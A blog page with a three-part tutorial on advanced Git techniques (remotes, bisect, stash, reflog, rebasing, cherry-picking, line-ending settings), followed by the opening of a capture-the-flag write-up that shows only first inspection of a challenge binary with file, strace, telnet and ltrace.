Subscribe to RSS Feed Submit to Reddit

Git Is The Answer 3/3

Published on 26 March 2013 by Răzvan Deaconescu and Mihai Maruseac

Finally, the third article on advanced git topics will focus on things that many will use only in some very special cases.

Handling Multiple Remotes

There are situations when you decide to use multiple remotes for a repository. For example, I’m using multiple remotes for my snippets repository:

razvan@einherjar:~/code$ git remote show
gh
gl
glcs
origin

razvan@einherjar:~/code$ cat .git/config
[remote "origin"]
    fetch = +refs/heads/*:refs/remotes/origin/*
    url = razvan@swarm.cs.pub.ro:git-repos/code.git
[remote "gh"]
    url = git@github.com:razvand/snippets.git
    fetch = +refs/heads/*:refs/remotes/gh/*
[remote "gl"]
    url = git@gitlab.com:razvand/mine.git
    fetch = +refs/heads/*:refs/remotes/gl/*
[remote "glcs"]
    url = git@gitlab.cs.pub.ro:razvan.deaconescu/code.git
    fetch = +refs/heads/*:refs/remotes/glcs/*

One particular situation when multiple remotes are required is when using a fork of a GitHub repository and doing pull requests. This is also mentioned in the “Syncing a fork” article on GitHub.

After you create a repository fork on GitHub, you clone that fork. For example, I’ve forked the ROSEdu site repository in my forked repository. I’ve cloned the forked repository, worked on the local clone and then pushed changes. I would then create a pull request with those changes, that that they would be integrated in the main repository.

A problem arises when the fork is not synced with the main repository. Ideally, there would be a GitHub option to sync the fork. Since that doesn’t exist, the fork needs to be updated manually, though the local copy, as mentioned in the “Syncing a fork” article on GitHub.

First of all, you need to add the main repository as another remote to the local repository. This is a read-only remote. As suggested by GitHub, I’ve named this new remote upstream:

razvan@einherjar:~/projects/rosedu/site/site.git$ git remote show
origin
upstream
razvan@einherjar:~/projects/rosedu/site/site.git$ git remote show upstream
* remote upstream
  Fetch URL: git@github.com:rosedu/site.git
[...]

In order to sync the local repository with the upstream remote (the main repository) just fetch and rebase changes:

razvan@einherjar:~/projects/rosedu/site/site.git$ git fetch upstream
remote: Counting objects: 16, done.
remote: Compressing objects: 100% (7/7), done.
remote: Total 11 (delta 6), reused 9 (delta 4)
Unpacking objects: 100% (11/11), done.
From github.com:rosedu/site
   d21f23f..7411020  master     -> upstream/master
razvan@einherjar:~/projects/rosedu/site/site.git$ git rebase upstream/master
First, rewinding head to replay your work on top of it...
Fast-forwarded master to upstream/master.

This changes are then pushed to the origin remote (the forked repository):

razvan@einherjar:~/projects/rosedu/site/site.git$ git push origin master
Counting objects: 16, done.
Delta compression using up to 4 threads.
Compressing objects: 100% (11/11), done.
Writing objects: 100% (11/11), 1.99 KiB, done.
Total 11 (delta 6), reused 0 (delta 0)
To git@github.com:razvand/site.git
   6f3dd4d..7411020  master -> master

New local changes are then going to be pushed to the origin remote. These changes are then going to be aggregated into pull requests for the upstream remote (the main repository), now in sync with the forked repository.

The above is a specific use case for syncing a fork in GitHub, making use of two remotes: one for the original reposotiry and one for the fork. The excellent GitHub article thoroughly describes the steps you need to undertake to sync your fork.

Bisecting the History

A powerful feature of Git is its ability to quickly find out a commit which introduced a bad change. Suppose you have a bug in your application:

$ ./test_math.py 
2 + 3 = 6

Usually, it is possible that the bug was introduced several commits backwards in time and it is harder to solve by debugging. Git comes to help with git bisect. First, start, the process with git bisect start and mark a good and a bad commit (the boundaries of the bisect range).

$ git bisect start
$ git bisect good 368297b26ac1f0dc4
$ git bisect bad
Bisecting: 7 revisions left to test after this (roughly 3 steps)
[9e7e7252bc95453817187ef4f1a8d69fd4ed74d7] Modify test_math.py

Git has found a commit in the middle of the range. You test your code again and see if the problem is solved or not. Then pass good or bad to git bisect

$ ./test_math.py
2 + 3 = 5
$ git bisect good
Bisecting: 3 revisions left to test after this (roughly 2 steps)
[1c6fddb664ce6cb7bb483b8413b8e1216666c89f] Modify test_math.py (4).

Continue this process until there are no more commits left in range.

$ git bisect good 
1c6fddb664ce6cb7bb483b8413b8e1216666c89f is the first bad commit
commit 1c6fddb664ce6cb7bb483b8413b8e1216666c89f
Author: Andrei Petre <p31andrei@gmail.com>
Date:   Sat Mar 9 00:24:43 2013 +0200

    Modify test_math.py (4).

Git even shows you the commit and it’s message. Now, do a simple git show to see the changeset of the bad commit:

$ git show 1c6fddb664ce6cb7bb
commit 1c6fddb664ce6cb7bb483b8413b8e1216666c89f
Author: Andrei Petre <p31andrei@gmail.com>
Date:   Sat Mar 9 00:24:43 2013 +0200

    Modify test_math.py (4).

diff --git a/test_math.py b/test_math.py
index a6624f7..6e7f061 100755
--- a/test_math.py
+++ b/test_math.py
@@ -4,7 +4,7 @@ def custom_sum(*args):
     """Calculate the sum of two given numbers.
        Make the sum work for multiple arguments
     """
-    crt = 0
+    crt = 1
     for var in args:
         crt += var
     return crt

In the end, you do a git bisect reset to return to the starting point. Do the fix, commit and continue contributing to the project.

Finally, you can use git bisect with automated tests. Start the bisection with git bisect start but pass the two end-points as well

$ git bisect start HEAD 368297b26ac1f0dc4
Bisecting: 7 revisions left to test after this (roughly 3 steps)
[9e7e7252bc95453817187ef4f1a8d69fd4ed74d7] Modify test_math.py

Then use git bisect run with a script which returns 0 if the code is ok or anything else if the bug is still present. Git will do the bisection for you.

[mihai@esgaroth repo3]$ git bisect run ./test.sh
running ./test.sh
Bisecting: 3 revisions left to test after this (roughly 2 steps)
[1c6fddb664ce6cb7bb483b8413b8e1216666c89f] Modify test_math.py (4).
running ./test.sh
Bisecting: 1 revision left to test after this (roughly 1 step)
[d8a251d8348ac236d344a00b50a987e2af726663] Modify test_math.py (2).
running ./test.sh
Bisecting: 0 revisions left to test after this (roughly 0 steps)
[2a084b613f6b69cc8eb44648b8b5665402f5d9c0] Modify test_math.py (3).
running ./test.sh
1c6fddb664ce6cb7bb483b8413b8e1216666c89f is the first bad commit
commit 1c6fddb664ce6cb7bb483b8413b8e1216666c89f
Author: Andrei Petre <p31andrei@gmail.com>
Date:   Sat Mar 9 00:24:43 2013 +0200

    Modify test_math.py (4).

bisect run success

This is indeed a good tool to have in Git’s toolbox.

Stashing the Goodies

It often happens that you’ve done some changes that you don’t want to commit yet but you need to sync with the remote repository (i.e. do a pull). Or you want to merge a branch without commiting your changes. In this case, the solution is using the stash.

The stash is a special place for Git where you temporarily stash your changes in order to keep your repository clean:

razvan@einherjar:~/projects/rosedu/site/site.git$ git status
# On branch master
# Changes not staged for commit:
#   (use "git add <file>..." to update what will be committed)
#   (use "git checkout -- <file>..." to discard changes in working directory)
#
#	modified:   irc.markdown
#
no changes added to commit (use "git add" and/or "git commit -a")
razvan@einherjar:~/projects/rosedu/site/site.git$ git stash
Saved working directory and index state WIP on master: 7411020 Remove a stupid Maruku error.
HEAD is now at 7411020 Remove a stupid Maruku error.
razvan@einherjar:~/projects/rosedu/site/site.git$ git status
# On branch master
nothing to commit (working directory clean)
razvan@einherjar:~/projects/rosedu/site/site.git$ git stash pop
# On branch master
# Changes not staged for commit:
#   (use "git add <file>..." to update what will be committed)
#   (use "git checkout -- <file>..." to discard changes in working directory)
#
#	modified:   irc.markdown
#
no changes added to commit (use "git add" and/or "git commit -a")
Dropped refs/stash@{0} (940f594b5f93e616dc16285e0677fbc78aa33620)

The moment you stash changes, they “disappear” from the working directory. You will be able to get them by using git stash pop.

When multiple users are working on a given repository it will often happen that you need to pull their updates to see what has been done. Your local copy may have changes you’ve made yourself, but still far from a commit. In that case you would stash your changes, pull remote updates to sync your repository and then pop the stash to continue your work.

A Reference For Everything

We are near the end of the series. You have learned several things and you might try others as well. Yet, from time to time you may find out that you have lost a commit while playing around. Or, you rebased somewhere in the past but you need a commit which you had skipped. Or, you used git reset --hard and threw out a needed commit.

Luckily for you, Git doesn’t lose anything. Everything can be recovered by using a nice feature called reflog (from reference log). Let’s see it in action first.

$ git reflog
096bec6 HEAD@{0}: commit: Add suggestion from Stefan Bucur.
8647ca7 HEAD@{1}: rebase finished: returning to refs/heads/master
8647ca7 HEAD@{2}: checkout: moving from master to 8647ca7c213ef26fe3426e079356a8b9c0ef1a8f^0
f020807 HEAD@{3}: commit: Ready to publish «Git is the answer - part 2» article.
274c7bc HEAD@{4}: rebase finished: returning to refs/heads/master
274c7bc HEAD@{5}: checkout: moving from master to 274c7bcc89487e3b3e5f935694046caf17bf005f^0
97b6f11 HEAD@{6}: commit: Add TODO for conclusions.

The first column lists the commit hash at the point where the reference points to. The second is the state of HEAD (HEAD{1} is where HEAD previously was and so on). Then, you have a short description of what the reference is about (a commit, a checkout, a merge, a reset, etc.). This helps you in remembering what each change was about.

To recover a commit you just cherry pick it from the reflog using its hash or even the HEAD@{id} reference.

Garbage Collecting the Repository

In the end, let’s focus on trimming down the disk usage of the repository. We want to prune some references. First, we set an expire date:

$ git reflog expire --expire=1.day refs/head/master

The above marks all references older than 1 day as being obsolete.

The second step is to find all unreachable objects:

$ git fsck --unreachable
Checking object directories: 100% (256/256), done.
Checking objects: 100% (80/80), done.
unreachable blob 0aa0869906576afbe970251418982a5ae1a21698
unreachable blob c1b86d806044ba5e344e037ec0128f7e944d0e0f
unreachable blob 1f4998496071654c1b16eb33932d9d8b4fee5971
unreachable tree 4b825dc642cb6eb9a060e54bf8d69288fbee4904
unreachable blob d9024465bff70288deaa116a646c01f1af7170b6
unreachable blob ec1a48a4de254e80e803b4a4daa4a1f87fe4acea
unreachable blob f0c2af9359d0c360fae9779f8c8b3143e7002810
unreachable blob 17135e0a43db16a2d127a4cb2a692b41257c8c26
unreachable tree 39d3a7c06c75d063cc13adde71b745f412a6f84f
unreachable tree fad372db5c9c9b842d3786733437c5e32dda426b
unreachable blob 07c469400c9ed887416d16a178a28cb911e6634e
unreachable tree 8c1deacee70bb3329ae6cd4fa2fbf546395ea712
unreachable blob ad85a1ec621c5b58fd6876c4d88982406bd48156
unreachable tree c865c8cb1344f77363c5314a91344623fe0dd661
unreachable blob cdd55939c346385b7938f392f958812b4fa5ddaf
unreachable blob d8255f99d74b09435a70ad3f2b23b0e69babc818
unreachable blob f7ddf120540a448c50baba1047230e9ad7d687ac
unreachable tree 30ce2c01c2792fdc4dfa6ab5c3e0c1cb876a405a
unreachable blob 09cf62d09bb027f7cfabcb0333c1837fda3c9c92
unreachable blob 435716d9434a852229aee58d16104c3335684113
unreachable blob 974f61a4933ee5608b1810e569593adf2ffedd0b
unreachable tree b3df14961958afa1b0434c1a31065751fef3b30d

Finally, we prune everything and then garbage collect the repository.

$ git prune
$ git gc
Counting objects: 652, done.
Delta compression using up to 4 threads.
Compressing objects: 100% (637/637), done.
Writing objects: 100% (652/652), done.
Total 652 (delta 373), reused 64 (delta 10)

We can check the reduction in size by issuing a du . before and after the process. For this repository, we’ve managed to squeeze 3MB of space, not quite an impressive feat. However, for rapidly changing projects the gains should be higher.

In the end, looking at reflog we see

$ git reflog --all
16a82d6 refs/remotes/gh/master@{0}: update by push
d3f979f refs/remotes/gh/master@{1}: update by push
454935e refs/remotes/gh/master@{2}: pull --rebase: fast-forward
bae10c0 refs/remotes/gh/master@{3}: update by push
c0a692b refs/remotes/gh/master@{4}: pull --rebase: fast-forward
04c5a1b refs/remotes/gh/master@{5}: pull --rebase: fast-forward
745963b refs/remotes/gh/master@{6}: pull --rebase: fast-forward
fd23db9

The last line shows the id of one commit but nothing more related to it. You can still reset/rebase to there but you cannot point to any reference past it.

Closing Up

We are at the close of this three part article on advanced git usage. Some of the things presented here might make you ask when I’ll be using that?. Some of them will prove useful from time to time while others are a good thing to know.

In the end, remember that Git is a swiss army knife among VCSs and there are a lot of features which will make us masters of it should we learn and practice using them. Like Vim, above a certain threshold Git can only be learnt by using it on a day to day basis.

Git Is The Answer 2/3

Published on 22 March 2013 by Răzvan Deaconescu and Mihai Maruseac

The second article on advanced git topics is focused on cases where multiple branches are involved.

My Changes Conflict With Yours

Usually, it happens that two developers are working on the same file. Git tries its best to merge changesets from both developers without complaining. However, Git is not a human being so it cannot know what change is the good ones when two changes happen two close to one another in the file.

As opposed to SVN, in Git, it is the responsibility of the one who pulls to solve conflicts. Thus, you are forced to solve conflicts before being able to push your changes upstream. But how does it work?

When you try to pull a file which contains conflicting changes, git will stop with a strange message. We will use the git pull --rebase command instead of the git pull.

Using index info to reconstruct a base tree...
M   numbers
Falling back to patching base and 3-way merge...
Auto-merging numbers
CONFLICT (content): Merge conflict in numbers
Failed to merge in the changes.
Patch failed at 0001 Add a don't like line.
The copy of the patch that failed is found in:
   /tmp/repos/repo3/.git/rebase-apply/patch

When you have resolved this problem, run "git rebase --continue".
If you prefer to skip this patch, run "git rebase --skip" instead.
To check out the original branch and stop rebasing, run "git rebase --abort".

Even the file you changed looks awkward:

4
<<<<<<< HEAD
insert here 5
=======
I don't like this line 5
>>>>>>> Add a don't like line.
6

As you can see, there are 3 more lines inserted. The ones starting with <<<<<<< and >>>>>>> mark the boundary of the conflicting area as well as the origin of the two conflicting changes (in our case HEAD is our repository’s latest commit while Add a don't like line. is the commit message of the last commit on the remote).

Between the two marks, you have the two changes, separated by =======. You, as a developer, have to choose what makes sense: either keep only one of the changes, merge them together or even write something totally new.

You edit the file with the desired change and add it back for staging. After this you simply continue the rebase process.

git add numbers
git rebase --continue

If there are more conflicting changes you will have to reapply the same procedure. Otherwise, you can go forward to pushing your changes. As you can see, no conflict ever leaves your repository, you are forced to deal with it before continuing.

Note: Remember to solve all conflicts in the same file before continuing the rebase process. Otherwise artifacts will be committed. (this is an edit suggested via comments by Stefan Bucur).

Tags and Branches For The Win

Tags are the best way to keep references to old commits. They are particularly helpful in school related activities, where you update lectures and lab tasks on an yearly basis.

The right way to handle this is to create a tag at the end of each year and update labs and tasks. If at any time you want to check out the old curriculum you can get back to that tag.

For example, for the SAISP repository, we’ve created tag a tag at the end of each year of study:

razvan@einherjar:~/school/current/saisp/repo$ git tag
2009-2010
2010-2011
2011-2012

If we would like to go to an old version we would simply create a branch starting from that tag:

razvan@einherjar:~/school/current/saisp/repo$ git checkout -b br-2010-2011 2010-2011
Switched to a new branch 'br-2010-2011'
razvan@einherjar:~/school/current/saisp/repo$ git status
# On branch br-2010-2011
nothing to commit (working directory clean)

This allows easy organization of your tree, with no need to create other folders (one for each year). If you want to access information for a given year, you would just create a new branch.

This isn’t the case for the current CDL repository. I’m not particularly happy with it and will probably update it soon. As we weren’t very Git aware at the time we’ve created the repository, we started using a folder for each year:

razvan@einherjar:~/projects/rosedu/cdl/repo.git$ ls
2009  2010  2011  2012  2013  Makefile  curs1  git_tutorial  template  util

This is unnecessary and results in duplicate information, copied from one year to the other.

The solution is pretty simple: identify the last commit for each CDL session/year, tag it and then, if required create branches out of it.

Identifying the last commit for each CDL session is easily done through gitk. Browse the commits, look at the dates, identify the last commit and create a tag:

razvan@einherjar:~/projects/rosedu/cdl/repo.git$ git tag 2009 e9858a9e74
razvan@einherjar:~/projects/rosedu/cdl/repo.git$ git tag 2010 26cd285f47
razvan@einherjar:~/projects/rosedu/cdl/repo.git$ git tag 2011-spring eaa2d7e9a8
razvan@einherjar:~/projects/rosedu/cdl/repo.git$ git tag 2011-fall f69e679ebd
razvan@einherjar:~/projects/rosedu/cdl/repo.git$ git tag 2012 fd23db9181

Afterwards, we can create branches for each of them to easily go to that point:

razvan@einherjar:~/projects/rosedu/cdl/repo.git$ git branch br-2012 2012
razvan@einherjar:~/projects/rosedu/cdl/repo.git$ git branch br-2011-fall 2011-fall
razvan@einherjar:~/projects/rosedu/cdl/repo.git$ git branch br-2011-spring 2011-spring
razvan@einherjar:~/projects/rosedu/cdl/repo.git$ git branch br-2010 2010
razvan@einherjar:~/projects/rosedu/cdl/repo.git$ git branch br-2009 2009
razvan@einherjar:~/projects/rosedu/cdl/repo.git$ git branch
  br-2009
  br-2010
  br-2011-fall
  br-2011-spring
  br-2012
* master
  old-master
  razvan

Of course, it would only makes sense to really clear the repository and turn it into a “normal” one that only stores current information. Remove old year data and show only current one:

razvan@einherjar:~/projects/rosedu/cdl/repo.git$ ls
2009  2010  2011  2012  2013  Makefile  curs1  git_tutorial  template  util
razvan@einherjar:~/projects/rosedu/cdl/repo.git$ git rm -r 2009
razvan@einherjar:~/projects/rosedu/cdl/repo.git$ git rm -r 2010
razvan@einherjar:~/projects/rosedu/cdl/repo.git$ git rm -r 2011
razvan@einherjar:~/projects/rosedu/cdl/repo.git$ git rm -r 2012
razvan@einherjar:~/projects/rosedu/cdl/repo.git$ git mv 2013/* .
razvan@einherjar:~/projects/rosedu/cdl/repo.git$ rmdir 2013
razvan@einherjar:~/projects/rosedu/cdl/repo.git$ ls
Makefile  curs1  curs3  git.mm  git_tutorial  schelet_inscriere  template  util
razvan@einherjar:~/projects/rosedu/cdl/repo.git$ git commit -m 'Clear folder structure. Leave only current items'

All is now nice and clear. Any updates are going to be done on the current folder structure; any request to see old data can be handled by checking out one of the branches.

Branches on a Virtual Machine

In our experience we come to situations when required to work on the desktop/laptop and on a virtual machine. Of course, we are using Git for storing code. It would only make sense for one repository to be a remote for another one. The case is that, with Git, every repository can be a remote.

As such, I usually create a clone of the laptop repository on the virtual machine. I usually do that with the SO2 repository when updating lab tasks or assignment solutions and tests. The laptop stores the main repository and the virtual machine uses a clone of that:

root@spook:~# git clone razvan@einherjar.local:school/current/so2/git-repos/lab lab.git
root@spook:~# cd lab.git/
root@spook:~/lab.git# git remote show origin
* remote origin
  Fetch URL: razvan@einherjar.local:school/current/so2/git-repos/lab
  Push  URL: razvan@einherjar.local:school/current/so2/git-repos/lab
[...]

In order to work properly on the remote you would need to use a dedicated branch to push information. You’ll have problems if you push to the master branch of a repository that is using the master branch itself. I usually dub this ‘vm’ (for virtual machine):

root@spook:~/lab.git# git checkout -b vm
Switched to a new branch 'vm'

Any further changes are going to be committed in the ‘vm’ branch. Subsequently you would push these commits to the main repository, on the laptop:

root@spook:~/lab.git# git push origin vm
Total 0 (delta 0), reused 0 (delta 0)
To razvan@einherjar.local:school/current/so2/git-repos/lab
 * [new branch]      vm -> vm

On the main repository, you would just merge or rebase your changes from that branch:

razvan@einherjar:~/school/current/so2/git-repos/teme$ git rebase vm
First, rewinding head to replay your work on top of it...
Fast-forwarded master to vm.

At this moment, all changes in the repository clone on the virtual machine are present in the master branch on the repository on the laptop. You need to create a separate branch on the virtual machine clone and then push that branch to the main repository. If you would work on the master branch on the virtual machine clone and push that, it would be problematic to integrate those changes in the master branch on the main repository.

Going After Cherries

In some cases, when working with multiple branches, it might happen that you need a specific commit from one branch but you don’t want to merge that branch into your current one.

Fortunately, Git allows you to pick a single commit as easy as picking cherries from a cherry-tree. In fact, the command is git cherry-pick.

$ git cherry-pick 1904c3d4c9720
[master 3a30153] File to be cherry-picked in master.
 Author: Andrei Petre <p31andrei@gmail.com>
 1 file changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 file_to_get_in_master

Now, you have a new commit with the same change as the picked-up commit but on your branch

$ git log
commit 3a3015378c3c1b43c4895a00829034d53fb9a5b5
Author: Andrei Petre <p31andrei@gmail.com>
Date:   Fri Mar 8 23:59:07 2013 +0200

    File to be cherry-picked in master.

As you can see, the commit hash is different meaning that there is a new commit, not the old one.

Should a commit not apply cleanly, Git stops the cherry-picking process and asks for human intervention. After the problems are resolved, you can continue it with git cherry-pick --continue. Or, you can abort it via --abort if you change your mind after seeing the trouble.

Git Is The Answer 1/3

Published on 18 March 2013 by Răzvan Deaconescu and Mihai Maruseac

We focus again on git. This time, we will present some real-world scenarios where knoweldge of advance git topics helps. In order to keep down the length of the article, our presentation is divided in 3 parts, this being the first one of these.

User Setup

After installing Git and before doing any commits into a repository, you must setup your user information and preferences. It is common to make a global configuration, using git config:

git config --global user.name "Razvan Deaconescu"
git config --global user.email "razvan.deaconescu@cs.pub.ro"
git config --global color.ui auto

You should make this setup for each account you are using. At the minimum, you are going to use it at least for your laptop or workstation.

Global configuration is stored in ~/.gitconfig.

In case you want to use another username within a repository, use the git config command in that repository, but without the --global option:

cd /path/to/repository.git
git config user.email "razvan@rosedu.org"

In the above setup, I have only updated the email address for the repository. The other options used are picked from the global configuration.

Per repository configuration is stored in /path/to/repository.git/.config.

Handling Line Endings Like a Pro

From time to time it is possible that you will have to work with people working on a different operating system. It is no problem if both of you are using systems with similar line-endings (CRLF for Windows, LF for Linux/OSX). In all other cases, it might be that the default Git options used for this don’t work for you.

You can configure Git globally to handle line-endings if you set the core.autocrlf option in your ~/.gitconfig. However, the best settings are different on different platforms.

For Windows you would use

git config --global core.autocrlf true

While for Linux/OSX you would use

git config --global core.autocrlf input

You must remember that these changes are valid only for you, and for the operating systems which have these settings configured. To have the settings travel with the repository you have to go a different path: you have to create a .gitattributes file with a content similar to

* text=auto
*.c text
*.h text
*.sln text eol=crlf
*.png binary
*.jpg binary

The first line tells git to handle the line endings of all text files automatically. The second two lines declare that .c and .h files are to be treated as text (thus their line endings are to be converted to the proper format). The .sln line uses a new parameter (eol=crlf) which tells Git to normalize files on commit but to always checkout them with CRLF endings. Use this for files which need to have CRLF endings, even on Linux. A similar settings exists for LF endings.

Finally, there are cases when you need to commit binary files into the repository. In this cases, changing LF characters to CRLF or the reverse will break the binary. You have to tell Git not to handle them, thus you’ll specify binary in .gitattributes file.

If the repository already contained some files commited, after creating the .gitattributes file each of you will have files show up as modified, even if they haven’t changed. This is because of the line endings changes which was not followed by repository renormalization. To solve this, you have to do the following steps (on a clean repository, otherwise changes will be lost).

First, remove everything from the index and reset both the index and the working directory (the risky part):

git rm --cached -r .
git reset --hard

Finally, stage all files which were normalized and create a normalizing commit

git add .
git commit -m "Normalized line endings"

From now on, Git will properly do the job of handling line endings for you.

How to Create and Setup a Local Repo

One of the best features of Git is the ability to rapidly create and use local repositories. You don’t have to create a repository and then clone it locally as you do in Subversion. You just create or access a directory and then initialize it as a Git repository. Changes to files in the directory will be able to be handled as commits.

Assuming I am working on a personal project, the first thing I would do is create a directory and initialize it as a Git repository. I recommend you append the .git extension:

mkdir ~/projects/troscot.git
git init ~/projects/troscot.git

The first thing you add in a repository is a .gitignore file stating the files you wish to ignore. Such a sample file is here.

You just create the .gitignore file in the repository root and then add it to the repository:

vi .gitignore
git add .gitignore
git commit -m 'Initial commit. Add global .gitignore file'

After this, one would create, add and commit any files required.

Another use case is adding repository support for existing directories. This may happen when there is some pieces of code you already have in place and want to place in a repository or, my personal use case, adding repository support to configuration directories. For example, if one would want to use versioning for Apache2 configuration files, one would issue (as root):

cd /etc/apache2/
git init .
vi .gitignore
git add .gitignore
git commit -m 'Initial commit. Add global .gitignore file'
git add .
git status
git commit -m 'Initial commit. Add all config files to repository'

The above commands add a .gitignore file in the repository and then add all Apache2 configuration files. The git status command is always necessary after a git add command to make sure you are committing the right stuff; you may need to update your .gitignore file in case you’ve missed ignoring certain types of files.

I Want To Tweak A Commit

From time to time you realize that you have made something wrong with a commit. Either you forgot to add a good, descriptive message or you have really screwed up some parts of the committed code. Maybe you have some compile errors to fix or your commit does too many things at once.

Anyway, for all of these cases, Git allows you to rewrite the commit at will. You can add changes of tweak metadata (author name, commit message, etc.) just by issuing the needed commands and ending with

git commit --amend

However, this works only for the tip of the current branch. If you want to change a commit which is not HEAD, you’ll need to do a rebase process. This will temporarily move HEAD to the commit you want to change, allowing you to use the above procedure. It is best to start the rebase interactively, so that you can have great control over what it does:

git rebase -i cf80a4ad6d64bff2

The above will open your editor (configurable via git config) with a content similar to the following one (you can see it on the disk if you really want to, it is in the repository, in .git/rebase/git-rebase-todo)

pick 899e7e6 Add Silviu's contributions.
pick 02f1ef9 Add contribs to Cristian Mocanu.
pick 98194cd Add contributions of Andru Gheorghiu.
pick 2931f1d Add 2 contributions of spopescu.

# Rebase cf80a4a..2931f1d onto cf80a4a
#
# Commands:
#  p, pick = use commit
#  r, reword = use commit, but edit the commit message
#  e, edit = use commit, but stop for amending
#  s, squash = use commit, but meld into previous commit
#  f, fixup = like "squash", but discard this commit's log message
#  x, exec = run command (the rest of the line) using shell
#
# These lines can be re-ordered; they are executed from top to bottom.
#
# If you remove a line here THAT COMMIT WILL BE LOST.
#
# However, if you remove everything, the rebase will be aborted.
#
# Note that empty commits are commented out

As you can see, you can select an action to be applied for each one of the commits. If you only want to edit the commit message, you will change pick with reword (or r). If you want to edit the content of the commit you will select edit. You can even reorder commits, squash them one a bigger one, etc.

For now, we will focus on editing the contents of one commit. We will change last line in edit.

e 2931f1d Add 2 contributions of spopescu.

The rebase process continues and tries to do what we’ve said it to do. In our case, it will stop at commit 2931f1d to allow editing it:

Stopped at 2931f1d... Add 2 contributions of spopescu.
You can amend the commit now, with

    git commit --amend

Once you are satisfied with your changes, run

    git rebase --continue

Now, you can add or remove content, change the commit as you want, etc. Then, you continue the rebase process by running git commit --amend followed by git rebase --continue. Both of them are needed.

If you decide that the commit is ok and that the rebase was not neeeded, you can always abort it with git rebase --abort.

Finally, keep in mind that it is not recommended to change commits once they have been pushed to another repository.

But My Commit Is Too Big

From time to time, you will have some big changes to commit. However, the case when all of them are atomic and cannot be split into several shorter components is very rare. Let’s take for our example a LaTeX Beamer file. You can commit each section separately or even each slide, as you see fit. But how can you split the commit?

Actually, you can use two commands for this. One is git add -i to allow interactive adding of parts of commits. The second one is to use git add -p which is more simpler.

Running git add -p will present you with the first chunk of changes to be committed. It might be the case that this is chunk is atomic or not. Git offers this question after presenting the hunk:

Stage this hunk [y,n,q,a,d,/,e,?]?

Selecting ? will print the help text and the chunk afterwards. The help text is

y - stage this hunk
n - do not stage this hunk
q - quit; do not stage this hunk nor any of the remaining ones
a - stage this hunk and all later hunks in the file
d - do not stage this hunk nor any of the later hunks in the file
g - select a hunk to go to
/ - search for a hunk matching the given regex
j - leave this hunk undecided, see next undecided hunk
J - leave this hunk undecided, see next hunk
k - leave this hunk undecided, see previous undecided hunk
K - leave this hunk undecided, see previous hunk
s - split the current hunk into smaller hunks
e - manually edit the current hunk
? - print help

Now, you can use these options to split your commit or edit it. Editing is the most advanced feature of git add -p, the only one who needs more explaining. So let’s choose this.

Stage this hunk [y,n,q,a,d,/,e,?]? e

Again, we will be presented with an editor to edit the contents of .git/addp-hunk-edit.diff. The comment at the end of the file is self-explanatory:

# To remove '-' lines, make them ' ' lines (context).
# To remove '+' lines, delete them.
# Lines starting with # will be removed.
#
# If the patch applies cleanly, the edited hunk will immediately be
# marked for staging. If it does not apply cleanly, you will be given
# an opportunity to edit again. If all lines of the hunk are removed,
# then the edit is aborted and the hunk is left unchanged.

The - lines are lines which will be removed by the commit and the + ones will be added. Thus, if you remove a + line, the commit will not contain the addition and if you mark one - line as context it won’t be removed by the commit.

Since git add -p is a powerful feature, it is advisable to have it added as an alias, via git config. For example, I have git gap do the same thing as git alias -p. Then, it is in my muscles’ memory to type git gap when adding changes for a new commit.

I Don’t Want This Commit Anymore

There is often the case that you want to rollback a change you’ve done. As long as everything is happening locally (i.e. you haven’t pushed to a remote repository), Git offers the proper tools to handle this.

Assume you’ve updated a file but you want to discard those changes. You’ve just done some tests and feel those are not required and want to get back to the initial version. Then you would issue

git checkout file-name

This above command restores the file to the repository version. It’s very useful in case you make a mess in a local file.

A quite often situation is preparing to make a commit. When you do that you use one or more git add commands to prepare the commit; sometimes you use a git add . command that gives you little control on what to add to the staging area. You find out that you’ve added too much content to the staging area. In order to remove that extra content from the staging area (and leave it in the working directory), one issues:

git reset HEAD file-name

If you want to start building your commit from the beginning and discard all information in the staging area, you would use:

git reset HEAD

When leaving out the file name, all content from the staging area is discarded.

Consider that you’ve done some bad commits and you’ve just found out. The last two commits are really bad and need to be dropped. As long as you haven’t pushed anything, you can rework those commits: you can reset the repository HEAD and leave the commit changes in the working directory. If we want to redo the last two commits we would just issue:

git reset HEAD^^

Remember, this doesn’t remove the commit changes. The repository HEAD is simply moved back and the commit changes are left in the working directory; you will then use them to create proper new commits.

I Want To Change This File Silently

GitHub has an excellent article on ignoring files. A particular situation is ignoring updates to files that are already in the repository (i.e. they’ve been previously commited and can’t be ignored using .gitignore).

This kind of situation is part of my repository with letters of recommendation. I’m using a Makefile for compiling out a letter and have isolated in it some variables:

$ cat Makefile
PERSON = Alexandru_Juncu
FOLDER = alexandru-juncu

include base.mk

When I would create a new recommendation I update the Makefile to compile it. However this change needn’t make it to the repository. If I would do that then each time I’m only compiling out an old letter of recommendation I would change the Makefile file and push the new changes; or, if I don’t want to push those changes, I would need to use git checkout.

The best solution would be for any updates to the Makefile to not be considered. The initial Makefile file would be stored in the repository (as a model) but subsequent changes should not be visible. This can be done by using:

git update-index --assume-unchanged Makefile

No changes on the Makefile file are going to be considered in the working directory.

If you want to revert this option, use:

git update-index --no-assume-unchanged Makefile

GiTS 2013 CTF -- return-to-libc -- pwnable 250

Published on 19 February 2013 by Lucian Cojocar

Introduction

This is a write-up for Pwnable 250 level from Ghost in the Shellcode capture the flag competition. Basically a return-to-libc attack will be described; we will also describe the steps for solving the mentioned CTF level using the original binary from the competition.

Hello binary!

Let’s start by inspecting the binary.

  • 32bit dynamically linked binary

    $ file ./back2skool-3fbcd46db37c50ad52675294f566790c777b9d1f
    ./back2skool-3fbcd46db37c50ad52675294f566790c777b9d1f: ELF 32-bit LSB executable, ...
  • it waits for connections on port 31337

    $ strace -f ./back2skool-3fbcd46db37c50ad52675294f566790c777b9d1f
    	[...]
    setsockopt(3, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0
    bind(3, {sa_family=AF_INET, sin_port=htons(31337), sin_addr=inet_addr("0.0.0.0")}, 16) = 0
    listen(3, 20)                           = 0
    accept(3, 

SO_REUSEADDR is used, just for easy debugging ;-) - it allows other sockets to bind() this port; no more getting the annoying error Address already in use after the server crashes.

	$ telnet localhost 31337
	Trying ::1...
	Trying 127.0.0.1...
	Connected to localhost.
	Escape character is '^]'.
	Connection closed by foreign host.
	$

It immediately drops connection.

Let’s have a look at what happens when we are connecting to it.

	$ ltrace -f ./back2skool-3fbcd46db37c50ad52675294f566790c777b9d1f
	[...]
	[pid 4359] accept(3, 0, 0, 0x697a0002, 1)                                           = 4
